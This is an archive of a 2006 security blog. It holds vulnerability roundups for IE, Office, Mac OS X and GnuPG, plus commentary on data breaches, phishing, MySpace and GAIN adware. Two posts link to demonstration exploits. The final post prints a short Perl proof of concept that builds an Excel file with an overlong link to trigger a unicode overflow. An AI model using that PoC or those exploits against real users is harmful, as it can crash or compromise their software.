Behind the Internet Wheels of Steel - Recording Live From Somewhere - Mixing the Fresh Beats of Technology, Intelligence, Science & Security together with the occasional bass-heavy break of Humor.
"There is no security on this earth, there is only opportunity"
- General Douglas MacArthur (1880-1964)
Friday, June 30, 2006
This Week in Vulnerabilities
2) F-Secure Multiple Products Scan Evasion Vulnerabilities - Multiple products by F-Secure are prone to scan-evasion vulnerabilities.Exploitation of these vulnerabilities may result in a false sense of security and in the execution of malicious applications. This could potentially lead to a malicious code infection. This was repoted by the vendor. Short and simple answer - upgrade.
3) Microsoft Internet Explorer 6 PoCs - Two vulnerabilities in Internet Explorer were published yesterday to the Full-Disclosure mailing list along with their associated PoC code.
A critically rated IE vulnerability in the use of HTA applications (CLSID 3050f4d8-98B5-11CF-BB82-00AA00BDCE0B) to trick a user into opening a file by double clicking it. The file has to be accessible through either SMB or, according to the advisory, WebDAV, and can be located on a remote site. The currently available version of PoC that was published is limited in that it requires the user to double click on an icon to execute a potentially malicious payload, but we can expect to find creative use of this exploit in the wild very soon. The workaround for this appears to be disabling active scripting.
The second vulnerability is related to the handling of the object.documentElement.outerHTML property. The abuse of this property will allow an attacker to retrieve remote content in the context of the web page which is being currently viewed by the user. This vulnerability can be potentially nasty as attackers can use it to retrieve data from other web sites user is logged into (for example, webmail) and harvest user credentials. Several handlers have spent a little more time validating this particular issue and while it is a subtle exploit and rated a lower level risk, this issue has raised some of our neck hairs.
4) Apple Mac OS X Format String Bug in launchd (PoC) - Another Mac OS X expoit from KF. Nice work man.
5) Apple Mac OS X ImageIO Stack Overflow in Processing TIFF Images - A remote user can cause arbitrary code to be executed on the target user's system. A remote user can create a specially crafted TIFF image file that, when loaded by the target user, will trigger a stack overflow and execute arbitrary code on the target system. The code will run with the privileges of the target user.
6) Microsoft Internet Explorer 7 Denial of Service (PoC) - Microsoft Internet Explorer 7 is prone to a denial-of-service vulnerability when parsing certain HTML content.Successfully exploiting this issue allows attackers to consume excessive CPU resources in affected browsers, denying service to legitimate users.
7) Microsoft Office - This whole month has been a bad one for the Microsoft Office team. With 3 or 4 seperate vulnerabilities discovered. Keep searching guys.....
------------------
It would appear that the Google SoC students are making some great progress on the beloved Nmap scanner. Nmap 4.11 was released recently.
Look for 4.20 Soon. It is currently Aphla2.
"Making the world a safer place through exploitation."
-Technocrat
Wednesday, June 28, 2006
Companies Start Holding Employees Responsible for Portable Device Security
The burden of lugging around laptop computers for work around the clock is getting heavier as companies place more of the responsibility of guarding against theft and other security lapses on their employees.
A number of companies, including Aetna Inc., Fidelity Investments and the U.S. unit of ING Groep NV, are revising their policies about how employees should handle confidential data stored on computers. Many employees are facing new restrictions on who can take confidential records out of the office and are receiving special training on how to keep data secure. Workers found violating security policies are being disciplined, or even dismissed.
Boeing Co. now requires laptops to be physically locked with a cable to a stationary object at all times, whether they are in offices, conference rooms or a car, so that no one can walk away with them. The aerospace giant has stepped up enforcement of a rule that confidential data must be accessed only on company servers, not stored on laptops. Boeing officials have started conducting random audits of laptops to check for unauthorized or unsecured files.
Some companies, including Aetna, the big health insurer, have begun telling employees that they can't use their own portable digital assistants such as Palm Pilots and BlackBerrys on company computers without permission. Other companies are disabling extra USB connections on workplace computers to make sure employees can't attach those accessories. And some even ban MP3 players in the workplace, security experts say. All these devices may lack encryption, and can be used to smuggle out confidential data.
"Employees are the weakest link" in securing data, says Jon Oltsik, senior analyst for information security at Enterprise Strategy Group, an information-technology industry analysis firm.
Before traveling on business, Marian Mays, payroll operations manager in Boeing's Seattle office, has started having her laptop examined by the company's security personnel to make sure she doesn't have any sensitive data stored on it. Once she is on the road, logging on to the company's server requires multiple passwords. "You just have to deal with it," she says. "We get creative with the passwords."
Wait a second! Perhaps I am confused....but how is this news? You mean companies are just now getting around to "disciplining or even dismissing" workers found to be violating security policies??
I think it is news that they haven't been doing this all along....someone write that article.
If any multi-million dollar company hasn't been doing this for years....they have a problem - plain and simple.
A policy without teeth to back it up is useless. Security isn't just about closing ports or upgrading software. Policy is a huge part of security. It controls the human factor.
It is impossible for a company to come down on any employee if no policy is in place for that security issue.
Moral of the story - Refine and Build up your corporate security policy. Then make sure you follow up with good teeth on those employees that do not follow policy.
Tuesday, June 27, 2006
PIRT - Five eBay Phishing Sites on the Same Server
I have reported three phishing sites in the last 30 mins. But one of the sites is just too much.
It is a site in the Czech Republic.
I have personally reported the exact domain two times in the past month for phishing.
Right now, it is hosting four (yes like the number) different eBay phishing sites.
I am 100% positive it is hosting more than those 4 because I saw another active report for the same domain that was another eBay phish, a different one than the four a reported.
It is almost to the point that the FBI should just arrest the people that run the domain...if they can get them in the Czech Republic.
Either the admins are really really really bad at locking down a computer or they are in on the crime.
Insane.
CastleCops Under Attack from a "Trademark Troll"
Gadi Evron recently blogged about the issue as well.
CastleCops is a small company that is run by two great people and this is just makes me sick to see Leo Stoller attempt to blackmail money from them.
As a PIRT handler, I take Leo’s move as a personal insult. The members of the PIRT team work hard to stop global phishing and to do everything in our power to protect the general public. The general public doesn't know what we do...and it really doesn't matter. We know we are making a difference and the bad guy know we are making a difference. That is what counts.
The security community can not stand by and let people like Leo attempt to profit off the hard work of volunteers.
Linux Hackers Have Mastered the VxWorks WRT54G v5
As predicted, the open source community has come up with a way to convert VxWorks-based LinkSys wireless WRT54G routers to Linux. The process does not require hardware hacking, and installs a recent version of "DD-WRT micro."
A version of Linux that supports the VxWorks-based "series 5" WRT54G has been available since April, when the DD-WRT project created its "micro" edition, with a 1.7MB footprint. However, the firmware could only be installed on routers modified to expose their JTAG ports (complicated instructions here).
Now, Jeremy Collake, aka "db90h," appears to have created a "VxWorks Killer" flash image that overwrites the VxWorks bootloader on series 5 WRT54G routers with normal Broadcom CFE firmware. This then enables the device to be put into maintenance mode at startup, after which Linux firmware can be installed easily.
Currently, the process is not reversible on WRT54G devices that have not been modified to add a JTAG interface. Additionally, power failure during the two second installation process could permanently incapacitate or "brick" the device.
Compared to the full DD-WRT distribution, the "micro" version leaves out packages that include chillispot, nocat, rflow, kaid, samba client, SNMP, IPv6, MMC/SD Card Support, SSH, PPTP/PPTP Client, and UPnP, according to WikiPedia. However, it does support PPPoE.
Additional details, downloads, and complete instructions can be found here. The WRTrouters.com website has also published a brief HOWTO, here.
Monday, June 26, 2006
Windows Live Messenger Contact List Heap Overflow
A remote user can create a specially crafted contact list (*.ctt) file that, when loaded by the target user, will trigger a heap overflow and execute arbitrary code on the target system. The code will run with the privileges of the target user.
A demonstration exploit is available at:
http://www.jaascois.com/exploits/18602016/CLexploits.ctt
School Blames Google for Student Information Leak
HICKORY -- Catawba County Schools took aim at Google Friday.
The system filed an injunction against the Internet search engine.
The temporary injunction, granted by the Honorable Richard D. Boner, calls for Google to remove any information pertaining to Catawba County Schools Board of Education from its server and index and alleges conversion and trespass against the corporation.
In short, schools say Google grabbed information they shouldn’t have.
Google says they are wrong.
Either way, the names, Social Security numbers and test scores of 619 students were still bouncing around the Web for people with computers to find and read until late Friday, when the page was apparently removed.
Catawba County Schools chief technology officer Judith Ray said her department removed the file from its storage server Friday. They are also working to delete any other electronic files that may contain Social Security numbers or other secure student information.
The information was stored in the system’s DocuShare server, which required a username and password to access, Ray said.
“One of the students on the list had a presence on the Web,” she said. “In Google’s effort to get information on her, one of its spiders latched onto her name in this document. We were not aware that password-protected sites are set up like that. To our knowledge, Google could only cache unsecure information that did not require a password or username.”
She’s right, Barry Schnitt, Google spokesman, said. “If there is a password, we cannot access or cache the site,” Schnitt said.
While the argument between the school system and Google continues, parents are voicing their own frustrations.
The central office received more than 50 calls from concerned parents and relatives Friday, said public information officer Beverly Lampe. One parent shared with Lampe that her daughter has been a victim of identity theft within the last year. The young woman’s name is on the list of 619 students.
Letters were mailed Friday to the parents of students whose name and information is floating on the Internet, alerting them to the situation.
Markley said information for parents is also available on the school system’s Web site.
“We have very secure systems here,” Markley said. “There are other private businesses and companies that don’t, so parents should be watching those as well.”
On the Net:
www.catawba.k12.nc.us
------------------------------------------
So the school most likely screwed up and now they want to point the finger at an automatic bot that searches the internet? Given, Google is pretty damn good at what is does....but it only grabs what it can see.
A simple robot.txt file would fix it.
So the school system's computers are so secure that they didn't have a robot file that disallows searching by bots???
Ummm yeah...
I have a better idea, if you don't want the information on the internet...don't put it on a internet facing computers. Period.
So it was password protected? Was it using SSL? Or could I have just grabbed the password via a simple MITM attack?
Companies are getting lazy with our personal information and I am getting sick of it...seriously.
RIP: GAIN Software
--------------------------------
http://www.claria.com/gainexit/
Important Information About GAIN Software
Claria will stop displaying GAIN pop-up and other ads on July 1, 2006 and will stop supporting all GAIN Supported Software on October 1, 2006. After October 1, 2006, GAIN software may not function properly.
Our software will continue to collect data about your web usage from your computer for research and other purposes as described in our Privacy Statement until September 30, 2006, unless you uninstall the software before this date.
It is recommended that you uninstall all of GAIN Supported Software presently on your computer. To view a list of GAIN Supported Software installed on the computer you are currently using click here.
You can also view a list of products that are part of the GAIN Network and installed on the computer by following these steps:
- Step 1: Click on the Windows Start button, select "Programs", "GAIN Publishing", and then "About GAIN Publishing".
- Step 2: When the About GAIN window opens, click on the "What is GAIN" tab, and then on the link for displaying a list of GAIN supported products.
To uninstall a GAIN supported application, follow these steps:
- From the Windows Start button, select "Settings", and then "Control Panel".
- When the Control Panel window opens, double-click on the "Add/Remove Programs" icon.
- When the Add/Remove Programs window opens, locate the GAIN supported application you wish to uninstall in the list of installed programs, click on that entry one time, and then click on the "Add/Remove" or "Change/Remove" button (depending on which version of Windows you are using).
- Follow the on screen instructions.
If you do not use the Windows Add/Remove Programs utility and instead attempt to remove GAIN-Supported Software by manually deleting files or folders, it is likely that your efforts will result in an incomplete removal of GAIN and/or GAIN-Supported software. In this case, please contact GAIN Publishing technical support at support@gainpublishing.com and they will be able to assist you in removing any remaining GAIN-related components.
What Does This Mean For You?
If you currently have any GAIN-Supported software installed on your computer, Claria recommends uninstalling them now. Since Claria will no longer support these applications in the near future, there is the possibility that they will cease to function properly. You can continue to use these products if you choose, and will no longer receive GAIN branded pop up and pop under ads after June 30, 2006. This doesn't mean that you won't receive other pop up and pop under ads from other web properties — you just won't receive any from the GAIN Network.
Additional Links
Determine what GAIN supported programs you have on your computer
List of GAIN-Supported SoftwareUninstall InformationSoftware Privacy Statement & License AgreementSupport Center
--------------------------------
Bye GAIN. It was nice not having you on my computer and fun fighting you off the corporate network. Thank god, they changed their name to Claria and built the BehaviorLink advertising network.
Saturday, June 24, 2006
Hacker Enters Agriculture Dept. Computers + More!
WASHINGTON - A hacker broke into the Agriculture Department's computer system and may have obtained names, Social Security numbers and photos of 26,000 Washington-area employees and contractors, the department said Wednesday.
Agriculture Secretary Mike Johanns said the department will provide free credit monitoring for one year to anyone who might have been affected.
Spokeswoman Terri Teuber said Thursday: "Protecting the privacy of our employees is a top priority for us, and to that end, we're conducting a thorough review through the entire department of 110,000 people to ensure the systems that contain private data are as protected as possible."
The break-in happened during the first weekend in June, the department said. Technology staff learned of the breach on June 5 and told Johanns the following day but believed personal information was protected by security software, the department said.
------------------------------------------------
It also appears the FTC lost a couple of computers on June 22nd as well. Two laptop computers containing personal and financial data were stolen from an employee's vehicle. The data included names, addresses, Social Security numbers, dates of birth, and in some instances, financial account numbers gathered in law enforcement investigations.
So one person lost two laptops?? And what happen to this man / woman? You will never hear that...
On a personal note, I finally got my Texas Guaranteed letter in the mail. I get free 60 day credit watch..YEAH!! lol
See all the other fun data lose incidents since ChoicePoint in 2005.
Only the Paranoid Survive - Phishing
It would seem that you can those tricky phishers have designed a new attack method.
They send a SMS message to your phone. The message describes how you have been signed up to a new dating service and will be charged $2.00 per day on your phone bill. The message directs you to a website if you want to cancel the service.
Ohh there’s the rub! Once loaded the page drops a Trojan, which at that point you are welcomed with open arms to a fresh new botnet family.
Why does this work? Couples of reasons come to my mind:
1) People are so connected to the virtual world of today, they almost forget about the cons of the real world like advance free fraud, pyramid letters schemes, etc.
Blended media attacks like the one described are normally crafted to reach a smaller target group. The bad guys take the time to build in more social engineering into the attack, therefore increasing the likelihood of success.
These facts also have the side-effect of reducing the surface exposure of the attack and therefore decreasing the chance of being stopped by the good guys.
The Mountain America Credit Union phish attack in Feb 2006 is a perfect example.
2) People want to be nice to other people - it is built into our nature. This niceness translates into trust far too often however. Then that false sense of trust is used by the attackers as a jumping point. They build and build on it until you forget why you even trusted them in the first place.
Very simple example - If someone is carrying a load full of things and can't get the door, we will open it.
This is a common trick used physical penetration testers to gain access to restricted areas.
Always remember to question the world around you.
“Only the paranoid survive” – Andrew S. Grove
Friday, June 23, 2006
Researchers hack Wi-Fi Device Driver to Breach Laptops
Article by Bob of IDG News -
-------------------------------------------------------------
Security researchers have found a way to seize control of a laptop computer by manipulating buggy code in the system's wireless device driver. The hack will be demonstrated at the upcoming Black Hat USA 2006 conference during a presentation by David Maynor, a research engineer with Internet Security Systems and Jon Ellch, a student at the U.S. Naval postgraduate school in Monterey, California.
...
The two researchers used an open-source 802.11 hacking tool called LORCON (Lots of Radion Connectivity) to throw an extremely large number of wireless packets at different wireless cards. Hackers use this technique, called fuzzing, to see if they can cause programs to fail, or perhaps even run unauthorized software when they are bombarded with unexpected data.
Using tools like LORCON, Maynor and Ellch were able to discover many examples of wireless device driver flaws, including one that allowed them to take over a laptop by exploiting a bug in an 802.11 wireless driver. They also examined other networking technologies including Bluetooth, Ev-Do (EVolution-Data Only), and HSDPA (High Speed Downlink Packet Access).
The two researchers declined to disclose the specific details of their attack before the August 2 presentation, but they described it in dramatic terms.
"This would be the digital equivalent of a drive-by shooting," said Maynor. An attacker could exploit this flaw by simply sitting in a public space and waiting for the right type of machine to come into range.
The victim would not even need to connect to a network for the attack to work.
"You don't have to necessarily be connected for these device driver flaws to come into play," Ellch said. "Just because your wireless card is on and looking for a network could be enough."
More than half of the flaws that the two researchers found could be exploited even before the wireless device connected to a network.
OmniPeek Personal Edition - Lookout Wireshark
It is like Netstumbler, Ettercap, and Ethereal all together in one program + plus more.
Thursday, June 22, 2006
Microsoft Excel 'Shockwave Flash Object' Lets Remote Users Execute Code Automatically
When the target user opens the Excel file, the Flash code will execute automatically without user interaction. The code will run with the privileges of the target user.
The vendor was notified on May 3, 2006.
Debasis Mohanty (aka Tr0y) discovered this vulnerability.
The original advisory, including a demonstration exploit, is available at: http://hackingspirits.com/vuln-rnd/vuln-rnd.html
Nice find Tr0y.
Top 100 Network Security Tools
Bunch of well deserved newcomers to the list as well. The list as grown by 25 tools earch time, that is a good sign in my mind.
THC - The Hacker's Choice - Moved for Now
They are having a little domain issue and are working to fix it. Until it is fixed the site can be accessed at the URL above.
Wednesday, June 21, 2006
GnuPG Parse_User_ID Remote Buffer Overflow Vulnerability
GnuPG is susceptible to a remote buffer-overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied input prior to copying it to an insufficiently sized memory buffer.This issue may allow remote attackers to execute arbitrary machine code in the context of the affected application, but this has not been confirmed.
GnuPG versions 1.4.3 and 1.9.20 are vulnerable to this issue; previous versions may also be affected.
I guess this means we should watch for a new GPG stable release pretty soon. Current stable is 1.4.3
Tuesday, June 20, 2006
Teen, Mom Sue Myspace.com for $30 Million
A 14-year-old Travis County girl who said she was sexually assaulted by a Buda man she met on MySpace.com sued the popular social networking site Monday for $30 million, claiming that it fails to protect minors from adult sexual predators.
The lawsuit claims that the Web site does not require users to verify their age and calls the security measures aimed at preventing strangers from contacting users younger than 16 "utterly ineffective."
The sad truth is that the mother and teen are completely right....and yet equally at fault. Myspace security is a joke, given.
Last year, I contacted Myspace asking them why they didn't use SSL for login? No answer. Can they not afford a single SSL cert with all that ad money? Seriously.
The teen is at fault for giving information away to everyone on the internet, including sexual predators. She is at fault for getting into a car with a stranger and most likely hiding this fact from her parents. When I was young, girls didn't go on dates that young..and if you did, you picked them up at their house and met their parents - at the very least.
Myspace is getting rich off of young people and IMHO could really care less about the dangers presented by the site, so in a way I hope this suit makes them change their ways.
However, the 14-year-old girl could have met a sexual predator anywhere. The mall, an AOL chat room, the parking lot after school, a cheerleader party, a girl sleepover with some of the other girl's boyfriend's friends, LiveJournal......everywhere. So it is 100% Myspace's fault? I don't think so.
I am not even sure it 50% Myspace's fault...but lets hope this case makes them wake up and see change their tune.
But if Myspace ask for my DL number or credit card, am I going to give it to them? Hell no...so where is the line?
French Microsoft Site Defaced - Update
It would appear that the defacer used a 0-day in a .net nuke script to gain enough access to the server to upload the new website. So, it sounds like it wasn't caused by a new IIS 6.0 o-day.
However, this does illustrate a very good security point. Every open port or installed piece of software is an attack point. It doesn't matter if you are running Linux, FreeBSD, OS X or even Windows 2003 sever.
The server may be secured up the ying-yang but if you install a vulnerable application on top of it...you are toast - no really....Maillard reaction even....
Defense in depth - it isn't just a new catchy security buzz word, it saves your ying-yang.
Monday, June 19, 2006
Microsoft Excel Unicode Local Overflow Exploit PoC
###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;
my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");
$worksheet = $workbook->add_worksheet();
$format = $workbook->add_format();
$format->set_bold();
$format->set_color('red');
$format->set_align('center');
$col = $row = 5;
$worksheet->write($row, $col, "kcope in da house! Click on the link!!!", $format);
$a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
$worksheet->write_url(0, 0, "$a", "LINK");
# milw0rm.com [2006-06-18]